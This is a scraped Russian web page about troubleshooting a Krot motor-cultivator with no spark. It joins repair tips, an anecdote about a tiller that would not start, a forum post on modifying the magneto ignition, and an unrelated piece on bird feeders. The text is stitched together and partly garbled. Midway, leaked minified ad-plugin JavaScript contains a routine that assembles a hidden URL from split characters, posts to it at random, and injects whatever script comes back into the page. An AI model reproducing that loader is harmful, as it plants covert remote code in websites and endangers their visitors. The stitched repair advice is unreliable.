Мотокультиватор Крот Нет Искры — JUSOF.COM

Мотокультиватор Крот Нет Искры - JUSOF.COM Мотоблоки

Алгоритм ремонтных работ мотокультиватора крот выглядит следующим образом:

  1. Для начала снимите корпус вентилятора;
  2. Не до конца отпустите несколько крепежных болтов;
  3. Установите щуповую пластину в зазор между башмаком маховика и статором, вкрутите крепеж;
  4. Покрутите маховик и проследите за зазором.

Выполнив эти операции, нужно проверить наличие искры на массе корпуса. Для этого посредством стартера прокрутите коленчатый вал. Если искры нет, значит, стартер потребуется немедленно заменить.

Важно

«Если вы хотите подключить к своему компьютеру новый принтер и у вас нет под рукой 12-летнего ребенка, то, скорее всего, вы промучитесь весь уик-энд» (с) Скотт Мак-Ниле, президент SUN Microsystems

Пришло время пахать. Выкатил свой мотоблок Meccanica Benassi MF 223, проверил масло, залил бензин, пытаюсь завести. Рядом собрались дети, наблюдают. Последний раз заводил мотоблок год назад, всего несколько раз и уже забыл, как это делается. Читаю раздел инструкции к Subaru Robin EX17 «Запуск двигателя» и делаю по ней:

Установил.» 2. …»

Но двигатель не заводится.

Еще раз читаю инструкцию и пытаюсь завести:

» 1. Установите выключатель двигателя в положение «I» (ВКЛ.) См. рис…»Проверил, установлено.» 2. …»

Двигатель не заводится.

В чем дело? Должен же завестись. Год назад заводился со 2-3-го раза.

Читаю инструкцию, к счастью, она небольшая, всего полтора десятка страниц мелким почерком. А там написано «Если Вы не собираетесь пользоваться двигателем в течение более 1 месяца, слейте топливо для того, чтобы предотвратить образование смолы в топливной системе и на деталях карбюратора». А я, …, год назад топливо не слил и теперь…

» 1. Установите выключатель двигателя в положение «I» (ВКЛ.) См. рис…»Проверил, установлено.» 2. …»

Но двигатель не заводится. Что ж такое?

Прочитал в инструкции про отстойник топлива, который нужно регулярно проверять. Нашел, открутил — чистый.

Может это я ослаб от зимней гиподинамии и слабо дергаю? Стал дергать энергичнее, но двигатель не заводится, а спина стала болеть.

Год назад все работало без проблем, налетал всего 2 часа. Зимовал в холодном помещении, но под навесом, почти никаких следов ржавчины. Все должно работать. Но двигатель не заводится. Везти в сервис проблематично. Сервис в Киеве. Мотоблок в мою машину не войдет. Заказывать газель 2 раза, чтобы увезти и привезти — накладно. Нужно снимать двигатель. Как же не хочется его разбирать.

Это же Monica Bellucci Meccanica Benassi — самый надежный мотоблок. Стоит столько, что страшно вспомнить (и с каждым рывком стартера все страшнее) и стыдно сказать. Двигатель Subaru Robin EX17 — написано Made in [email protected] Его же не наши хлопцы делали — он должен работать. Но он не заводится. Дети периодически просятся подойти поближе, но тут воняет бензином, и я не разрешаю.

Бензиновые двигатели ремонтировать мне не приходилось. Изучаю раздел инструкции «Поиск и устранение неисправности». Там пишут, что нужно проверить искру на свече. Для этого свечу нужно выкрутить, но она сидит глубоко, а обычным торцевым ключом ее не выкрутить. Мешают крышки с двух сторон. Как же не хочется его разбирать!

Снял, крышку пускового механизма, но до свечи все равно не добраться. Снял крышку с другой стороны свечи, под ней показался ГРМ, но до свечи все равно не добраться. Нужен торцевой ключ на 21, но не обычный, а удлиненный. Вспомнил, что в комплекте к бензогенератору было что-то похожее. Эврика!

Выкручиваю свечу — следов бензина не видно. Или нет подачи бензина, или так и должно быть. Приложил свечу к корпусу, завожу — искры нет. Значит не работает электропитание. В чем же дело? Внимательно изучаю электропроводку. Эврика! Вот в чем дело! Контакт, который идет от выключателя на корпус, плохо к нему прилегает.

Поправил. Пробую завести — не заводится.

Что же делать? Вроде ж примитивный аппарат, не сравнить с МИГ-25 ПДС. И все должно работать. Не уж-то Я, гигант мысли, … не смогу его завести. Что я делаю не так? Как же не хочется его разбирать! Но если я его не заведу, придется снимать двигатель и везти в Киев в сервис. Как же не хочется его разбирать! А время идет.

Бывший юный техник, «тот, который во мне сидит» (с), говорит: «Интересно посмотреть, что там внутри.» Но бывший авиамеханик, «тот, который во мне сидит» (с), говорит: «Чтобы техника не подводила техника, нужно технику поменьше лазить в технику.» А бывший механик по ремонту пишущих машин, «тот, который во мне сидит» (с), говорит:

«У тебя ж после сборки лишние детали останутся. Хлопцы в сервисе, в который все равно придется везти, будут сильно матюкаться. Наверняка неисправность найдут быстро, а потом будут исправлять твое творчество.» А бывший инженер-механик, «тот, который во мне сидит» (с), говорит:

Дети опять просятся подойти. Бензин почти не воняет, и я разрешаю. Мой 9-летний сын подходит, показывает на руль и спрашивает: «А чё это выключено?» Смотрю на руль, а там стоит вторая кнопка включения питания электродвигателя, о которой я забыл, и она отключена! «@#%&%#@*@%#%#@*@*@%#%@#%&%#@*@%#%#@*@!» — подумал Штирлиц. Включаю его. Двигатель завелся с одного рывка.

Дело в том что, к мотоблоку прилагается 2 руководства: на двигатель Subaru Robin EX17 и на мотоблок Meccanica Benassi MF 223. В инструкции к Subaru Robin EX17 пишут «Установите выключатель двигателя…», который находится на двигателе. И понятно, что о втором выключателе ни слова.

А в инструкции к мотоблоку Meccanica Benassi MF 223 о запуске двигателя ничего не говорится. В прошлом году я изучал все переключатели на руле и этот выключатель включил, а сегодня я туда не смотрел. А у моего малыша было много электрических игрушек, и он знает, что означает «On» и «Off».

29.04.2021

г.

Возможные причины

Мотоблок заводится и глохнет? Почему так происходит? Причин, по каким мототехника не заводится при пуске, может быть несколько. К ним можно причислить:

  • повреждения карбюратора (в агрегатах с бензиновым мотором);
  • дефект устройств зажигания и накаливания;
  • низкий уровень основной смазки.

Мотокультиватор Крот Нет Искры - JUSOF.COMИ в случае если засоряются жиклёры
, появляется непроходимость топливной системы, из-за чего карбюратор утрачивает способность гарантировать пуск двигателя. Для того чтобы ликвидировать дефект, производят ремонт топливопровода, который подразумевает частичный анализ карбюратора, промывку насоса, продувку жиклёров через штуцер для горючего.

Если мотоблок Нева не заводится, причины тоже могут быть разными. Иногда проблема скрывается в неисправности свеч зажигания, исполняющих немаловажную роль в пуске карбюраторного ДВС, либо свеч накаливания, которые обеспечивают запуск дизельного двигателя.

Решить подобную задачу можно различными способами:

  • осуществить незначительный ремонт и поменять нерабочие свечки на новые;
  • «прожечь» затопленные свечки и при помощи пламени вычистить их от следов топлива.

Мотокультиватор Крот Нет Искры - JUSOF.COM

Если при осмотре карбюраторного двигателя либо дизеля не было выявлено дефектных свеч, но трудности сохранились, да и ещё и сопровождаются хлопками в глушитель, необходимо проконтролировать функциональность абсолютно всех приборов, отвечающих за воспламеняемость горючего.

Мототехника не заводится и при недостатке смазочной жидкости в двигателе. Определённые модификации оборудованы особыми контрольными датчиками, которые при нехватке смазки не дают завести мотор. Особенное внимание необходимо уделять тем вариантам машин, у которых нет таких измерителей.

Кормушки из картона

Самый простой способ сделать мини-кафе для птичек – вырезать его из плотного картона.

Шаблон для вырезания и мастер-класс по сборке.

Ещё один вариант — шпагатом или, например, цветными шнурками соединить между собой две части коробки из-под обуви.

Лучше выбирать коробки ярких цветов или обклеить их интересными аппликациями, чтобы птицы наверняка увидели кормушку с лакомством. На дно кормовой подставки необходимо насыпать немного песка или мелких камешков, чтобы она меньше раскачивалась от ветра.

Коробка из-под сладкого новогоднего подарка также подойдёт для перекусов пернатых. Домик можно подвесить на ветку дерева, а также зафиксировать на окне с помощью присосок.

Бумажный лоток из-под яиц тоже сгодится для создания кормушки. Обыграть его можно яркой нитью или шпагатом. Ячейки под яйца будут служить порционными тарелочками.

Даже на основе пакета Тетра Пак можно сделать кормушку (простую, но креативную!). Для этого берем пустой чистый пакет, делаем на нем разметку «окошек» кормушки. Можно сделать сразу 2 окошка или даже 3, т. к. дополнительные отверстия позволят птицам брать корм сразу с нескольких сторон.

Под вырезанными окошками прорезаем небольшие отверстия и вставляем насесты для птиц (их можно сделать из палочек от мороженого, веточек или скрученного трубочками картона). Получившийся домик можно покрыть яркой краской, а затем подвесить на ветках дерева с помощью прочной нитки, проволоки или капрона.

Декорировать крышу «птичьей столовой» можно не только палочками от мороженого, но и натуральными природными материалами: веточками, травой, листьями, шишками, мхом и пр.

Если хочется творчески подойти к декору кормушки, то помимо покраски можно использовать цветную или скраповую бумагу. На зимнем варианте декора хорошо будут смотреться красногрудые снегири, шишки, сушеные ягоды, снежинки и даже белоснежное кружево. «Припорошить» крышу кормушки можно с помощью ваты.

Самое сложное время для птиц – это период с ноября по март. Мы в ответе за тех, кого приручили, поэтому если вы начали подкармливать птиц, то лучше делать это регулярно (минимум 3-4 раза в неделю). Хотя бы раз в неделю кормушку необходимо чистить от остатков корма, помета и пр.

Вешать кормушки можно на балконе вашей квартиры, во дворе загородного дома или дачи, в городских парках и скверах. Наполнять такие кормушки не составит особого труда. Если же вы хотите разместить кормушку в лесу, для подкормки диких птиц, то используйте кормушки с автоматическим дозатором.

Думая, что делают доброе дело, подкармливая птиц, люди очень часто вредят им. Оказывается далеко не все продукты можно давать нашим пернатым друзьям.

Меню для птиц может включать:

  • злаки: пшеница, ячмень, просо, овес, гречка;
  • семечки подсолнечника, тыквы и арбуза;
  • замороженные или сухие ягоды рябины, а также калина, бузина;
  • семена ясеня и клена специально для снегирей;
  • хлебные крошки;
  • несоленое сало специально для синиц;
  • орехи только очищенные и расколотые и нежареные: фундук, грецкий орех, кедровый орех, арахис;
  • пшеничный хлеб без плесени.

Есть ингредиенты, которые можно добавлять к основному корму птиц в качестве приправы: крупный песок, толченый мел, а также яичную скорлупу. Особенно это актуально, когда они строят свои гнезда.

Модернизация системы зажигания (мб-1) мотокультиватора «крот»

Приветствую всех! Хочу рассказать о переделке системы зажигания Крота, которая позволила мне избавится от всех проблем с надежностью зажигания, а в последствии и сильно облегчила заводку движка. Я такой доработки еще не встречал на страницах этого форума, и в других местах тоже, и надеюсь, что кому то проделанная мной работа пригодится.

Обо всем по порядку. Первую переделку я сделал еще в 2021 году. Посыл был прост. Основная беда магнето МБ-1, по моему скромному мнению – его миниатюрность (а также одна недоработка в схеме). Если бы конструкторы сразу пошли по пути, который известен по легким мотоциклам – разнесли бы генераторные катушки, электронную схему и катушку зажигания на разные узлы, то проблем бы у зажигания не было.

А тут получилось, что и генераторная катушка очень тонким проводом намотана, и катушка зажигания маловата, а главное – электронная схема установлена прямо на картере двигателя и легко нагревается градусов до 70-80. А ведь тиристор КУ202Н, применяемый в магнето рассчитан на температуру 75 градусов.

В итоге и частые выходы его из строя. Ведь тот же тиристор использовался и во многих мотоциклах и мопедах и ничего – работал. Тонкий провод обмотки генераторной катушки не давал возможности развить большой ток и поставить накопительный конденсатор хотя бы 1 мкФ, и как в мотоциклах добавить стабилитрон для отсечки лишнего напряжения.

В общем, давно родилась идея разнести все три элемента зажигания. Катушку сразу решил использовать автомобильную, имеющую многократный запас. Потом с автомобильной большой катушкой, искра при одинаковой схеме получалась минимум в три раза мощнее. И тут как раз очень удачно подвернулась автомобильная тойотовская катушка с коммутатором.

Коммутатор сгорел и на его место я как раз установил свою схему. Фото прилагаю. Катушку установил на пластину на руле. Высоковольтный провод стандартный, автомобильный. От родной МБ-1 оставил только генераторную катушку и катушку датчика. Вывел их проводами, причем для датчика решил взять экранированный.

Так вот. Что получилось после первой переделки – огромная надежность. Военный тиристор Т122-25-8, диодный мост на 1000 вольт, монументальная катушка зажигания. Слабых мест больше нет. Предыдущий хозяин за 10 лет эксплуатации сменил 6 МБ-1. А тут уже не сломается.

Но был и повод загрустить. Идеально работавшая на столе схема, дающая такую искру, что слона остановит, на движке несколько сникла. Упала мощность искры. Через некоторое время стало понятно, в чем дело. Виной тому – генераторная катушка. Очень тонкий провод и много витков.

Только сопротивление постоянному току около 3 кОм. А ведь при вращении еще и индуктивное сопротивление добавляется. В итоге при повышении оборотов напруга снижается. И вместо хотя бы четырехкратного увеличения мощности искры получилось двукратное (все на слух, на глаз, примерно).

На воздухе искра тянулась до 15 мм. Очень больших улучшений пусковых свойств эта схема не принесла (хотя прогретый движок можно было завести, если ладонью сильно толкнуть маховик на себя). То есть сильно понизилась частота искрообразования — почти как на тракторном магнето пробивать искру стало при вращении от руки.

Но главная беда осталась — проблема горячего пуска, которая на моем Кроте меня всегда мучила. 4 года эта схема верой и правдой мне служила. Я все хотел проиграться генераторной катушкой. Попробовать поискать с меньшим сопротивлением. Но как-то не доходили руки.

И вот прошлой осенью меня и посетила идея, которая преобразила характер мотора. Крутя в руках магнето, я понял, что на освободившееся место от катушки зажигания можно попробовать поставить вторую генераторную катушку. Пришлось поработать напильником, сточить часть магнитопровода катушки и посадочное место на магнето.

источник

Мотоблок крот не заводится🛠 [причины и ремонт неисправностей]

Мотоблоки Крот отечественного производства достойно конкурируют на рынке со многими известными иностранными марками. В первую очередь они берут своей доступностью в цене. Но, как и многой другой технике, так и Кротам соответственно свойственно выходить из лада и огорчать своих владельцев различными неполадками. Сейчас мы поговорим об одной распространенной проблеме с этими агрегатами: как завести мотоблок Крот.

Причины неисправностей запуска двигателя мотоблока:

  1. Засорен воздушный фильтр. Мы его просто заменяем.
  2. Если между электродами свечи отсутствует искра, нужно непосредственно менять саму свечу. Прежде чем установить свечу зажигания, нужно произвести монтаж уплотнительного кольца. При его затяжке не переусердствуйте, чтобы не сорвать резьбу цилиндровой головки.
  3. Если со свечи топливо стекает каплями, тогда нужно просушить цилиндр, просто прокачав двигатель ручным стартером.
  4. Помехой в работе мотоблока может стать нагар на свечи, ее можно починить, очистив ее с помощью шкурки и топлива.
  5. Если все-таки искра есть, но движок на мотоблоке все равно молчит, тогда может просто не быть изоляции из-за влажной или мокрой свечи. В этом случае нужно просто сменить наконечник.
  6. Одной из частых поломок есть выброс пламени из глушителя. К такой поломке может привести деформация шпонки маховика. Как осуществить замену шпонки:
    1. приступаем к разборке храповика стартера;
    2. скрываем корпус муфты;
    3. изымаем маховик и старую шпонку;
    4. устанавливаем новую шпонку;
    5. затягиваем корпус.
  7. Изношенный уплотнитель цилиндра либо между фильтром и карбюратором неправильно установлена прокладка. В этом случае нужно просто произвести замену уплотнителей, а также обязательно проверить, правильно ли они закреплены.
  8. В карбюратор не поступает топливо. Такое часто случается после длительного зимнего застоя техники в сыром помещении. В таком случае отремонтировать заводку нужно очистив стопорную иглу. Именно вокруг нее собираются все осадки и маслянистые образования, которые и служат помехой для нормальной работы механизма. В этом случае нужно произвести чистку детали.
  9. Используется некачественный бензин или топливо не соответствует двигателю. В этом случае будет намокать искра и потребуется замена наконечника.
  10. Отказ магнето. Для решения этой проблемы деталь заменяем на новую.
  11. Засорение дренажного отверстия в топливном баке. В этом случае нужно его очистить и продуть.

Если вы не уверены в своих технических знаниях и не совсем знаете, как правильно произвести замену детали, разборку механизмов и прочее, тогда стоит обратиться к специалистам. Они смогут быстро найти неисправность и избавиться от нее. Поверьте, это вам обойдется гораздо дешевле, нежели покупать новую технику.

Также помните, что для нормального функционирования вашего мотоблока стоит уделять ему постоянное внимание. А именно регулярно проводить диагностику, проверять исправность деталей и механизмов, производить своевременную замену масла. Это позволит предотвратить множество проблем и продлит срок эксплуатации агрегата.

«:’

‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ c «

«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count «

«:’

‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ c «

«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «ng» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}

Подготовка мотоблока к пуску

Мотокультиватор Крот Нет Искры - JUSOF.COM

Изучить аннотацию, составленную производителем, следует для того, чтобы узнать, какой рабочий оборот у мотора: четырёхтактный либо двухтактный. Это немаловажно понимать, так как для модификаций с двухтактным двигателем (как у культиватора Крота) необходима специальная горючая смесь, состоящая из смеси топлива и масла в особой пропорции.

Из-за несоответствия топлива спецтехника будет шуметь, а ещё могут пострадать свечки запала и топливопровод, что чревато отказом бензонасоса, а это уже непосредственный путь на дорогой ремонт в СТО. Установить, подходит ли топливо к мототехнике
, можно по появившемуся дыму. При плохом качестве топлива он будет иметь белый тон, как это случается при сильном наклоне автомобиля.

Качество горючего также немаловажно и для дизельного мотоблока. Он не заводится в зимнее время — или заводится, но в скором времени замирает — если в его мотор залита летняя солярка, поскольку при низких температурах она начинает сгущаться и забивать топливопровод.

Пуск мототехники как в летний сезон, так и в зимнее время должен проводиться в установленной очерёдности. К примеру, для запуска мотокультиватора марки Крот проводят такой порядок операций:

  • раскрывают бензокран;
  • устанавливают двигатель подсоса в состояние «Choke» (Пуск);
  • отключают зажигание и несколько раз крутят двигатель ручным стартером запуска;
  • снова запускают мотор и перемещают двигатель в состояние «Run» (Работа).

Нередко появляются условия
, когда силовой аппарат легко запускается, но через пару секунд замирает. В этом случае следует проконтролировать проходимость отстойника. Если причина в том, что кран замусорился, тогда его очищают бензином.

Завести мототехнику с дизельным двигателем
будет несколько труднее. Заводку дизеля начинают с «развоздушивания» топливного пути, то есть с избавления его от скоплений воздуха. Для этого:

  • раскрывают кран подачи горючего;
  • раскручивают соединения выводящего канала до возникновения топлива;
  • скручивают соединения и продувают все форсунки.

Мотокультиватор Крот Нет Искры - JUSOF.COM

Пуск мотокультиватора после зимы
либо продолжительного простоя также имеет собственные нюансы. Для того чтобы привести агрегат в рабочее положение, проделывают следующие манипуляции:

  • раскрывают бензокран;
  • проводят проверку, включено ли питание;
  • проводят проверку наличия смазки;
  • дают газу примерно до половины.

Прежде чем привести в действие мототехнику, проводят проверку всех соединений, включая участки трансмиссии, сцепление, механизмы запуска, и при потребности реализовывают их регулировку.

Пуск бензинового и дизельного агрегата

Мотокультиватор Крот Нет Искры - JUSOF.COMПуск дизельного мотоблока
и бензинового аппарата имеет отличия. По этой причине анализировать факторы, из-за которых не заводится агрегат, следует для каждого определённого типа мотора.

Перед тем как приобрести мотоблок
, производят подготовку спецтехники. Необходимо удостовериться в присутствии абсолютно всех элементов, удостовериться в прочности крепления механизмов.

Механизмы зачастую отказываются трудиться после зимы. Продолжительный перерыв становится предпосылкой возникновения неполадок в системах мотоблока. Сохранение в прохладном и влажном помещении приводит к следующим неисправностям:

  • окисление контактов;
  • нарушение изоляции проводков;
  • обводнение горючего и масла;
  • засорение жиклеров карбюратора.

Мотокультиватор Крот Нет Искры - JUSOF.COMПеред пуском нового мотоблока
производят контроль абсолютно всех соединений, троса сцепления, реверса и газа. Нельзя включать аппарат в том случае, если имеются зажимы и перекручивание нитей жгута.

Во время первого пуска непременно проверяют уровень масла в картере. Недостаток смазки испортит поршневую группу. Коленчатый вал крутится до 1400 витков в минуту на холостом ходу. Довольно пары секунд для создания задира на плоскости цилиндра.

Старое масло может быть причиной нерабочего двигателя. При этом мотоблок дымит выпускными газами белого цвета. Напрашивается абсолютная смена масла.

Следует принимать во внимание, что слабо заводится мини-трактор при недостающем объёме масла. Следите за данным параметром перед тем
, как заводить карбюраторный и дизельный мотоблок. В отдельных модификациях определяют защиту по низкому уровню. Прибор блокирует запуск, и агрегат замирает.

Следует не забывать, что любой вид мотора требует бензина конкретной марки. Для двухтактного двигателя горючее готовят отдельно. Топливная смесь состоит из топлива и масла. Число ингредиентов выдерживают в строгом балансе.

Оцените статью
Про мотоблоки
Добавить комментарий

Adblock
detector